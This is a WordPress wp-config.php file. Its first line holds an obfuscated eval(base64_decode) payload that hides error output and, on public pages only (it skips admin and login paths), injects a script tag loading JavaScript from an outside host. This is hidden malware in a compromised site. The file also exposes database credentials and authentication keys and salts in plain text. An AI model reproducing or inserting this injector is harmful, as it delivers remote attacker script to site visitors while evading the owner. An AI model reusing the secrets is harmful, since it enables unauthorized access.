eval(base64_decode("aW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCAwKTsKaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsIDApOwoKaWYgKFBIUF9TQVBJICE9PSAiY2xpIiAmJiAoCiAgICBzdHJwb3MoQCRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdLCAiL3dwLWFkbWluL2FkbWluLWFqYXgucGhwIikgPT09IGZhbHNlICYmCiAgICBzdHJwb3MoQCRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdLCAiL3dwLWpzb24iKSA9PT0gZmFsc2UgJiYKICAgIHN0cnBvcyhAJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl0sICIvd3AvdjIiKSA9PT0gZmFsc2UgJiYKICAgIHN0cnBvcyhAJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl0sICIvd3AtYWRtaW4iKSA9PT0gZmFsc2UgJiYKICAgIHN0cnBvcyhAJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl0sICIvd3AtbG9naW4ucGhwIikgPT09IGZhbHNlICYmCiAgICBzdHJ0b2xvd2VyKEAkX1NFUlZFUlsiSFRUUF9YX1JFUVVFU1RFRF9XSVRIIl0pICE9PSAieG1saHR0cHJlcXVlc3QiCikpIHsKICAgIHByaW50KGJhc2U2NF9kZWNvZGUoIlBITmpjbWx3ZENCemNtTTlJaTh2WVhONWJtTXVaM041Ym1ScFkyRjBhVzl1TG1OdmJTOGlQand2YzJOeWFYQjBQZz09IikpOwp9")); /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'CLwwRqCIFMXd3y' ); /** Database username */ define( 'DB_USER', 'CLwwRqCIFMXd3y' ); /** Database password */ define( 'DB_PASSWORD', 'TcKo4Y0pgHkUuH' ); /** Database hostname */ define( 'DB_HOST', 'localhost:3306' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'nO[Pdu9w~MBb%lL]kLi/kG$wA/kC;`d3>&@mMMD8xDWwnUvoz|s@:)va:[XA8nJa' ); define( 'SECURE_AUTH_KEY', 'I-NBuW>=i[q]SL^ jRM[J~`OWq!UTBP|?T)U@X(z4u6 Th%`%u&32}T2`MluqKnV' ); define( 'LOGGED_IN_KEY', ':K{ckU*wp>C2!~hbsfT#Q=doUgX=EmFpVIEaG,U~l{L=O?_7Zr4JJKZ0%T+p`6A`@,OH' ); define( 'AUTH_SALT', '%|9]tz(R,p%+T70h-iM;.FTh4E>8R&Bd6aWqK]Pr7s0v.oTzpqurJL2=CQ+_Wj j' ); define( 'SECURE_AUTH_SALT', 'th4sMR&/1k!/Nw#G+Z7:3OZmaS//Sq]7RvNh=Cv~RTm`]LGBvU%p~47ngSn0.Y,}' ); define( 'LOGGED_IN_SALT', 'Z)AE>h9O}49nTdH&`+PL&a683HMOWW%hEf4!6xc*zuD:c$9hLii?8OGMG[aKvt%t' ); define( 'NONCE_SALT', 'Kf1g0b6+{Oc7dL,rQHHK?Kf8Kx8,[v?dtSa%}8a9[VoXGQHDic.BU_%%6#MQ0h/J' ); define( 'WP_CACHE_KEY_SALT', 'dM&TK;w]U/lAEcyM3|GF nZJ,GyQ[0UiL1y@5)kWfFVXjRnottf:=b-g%^4Z*KJ_' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /* Add any custom values between this line and the "stop editing" line. */ /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ if ( ! defined( 'WP_DEBUG' ) ) { define( 'WP_DEBUG', false ); } /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';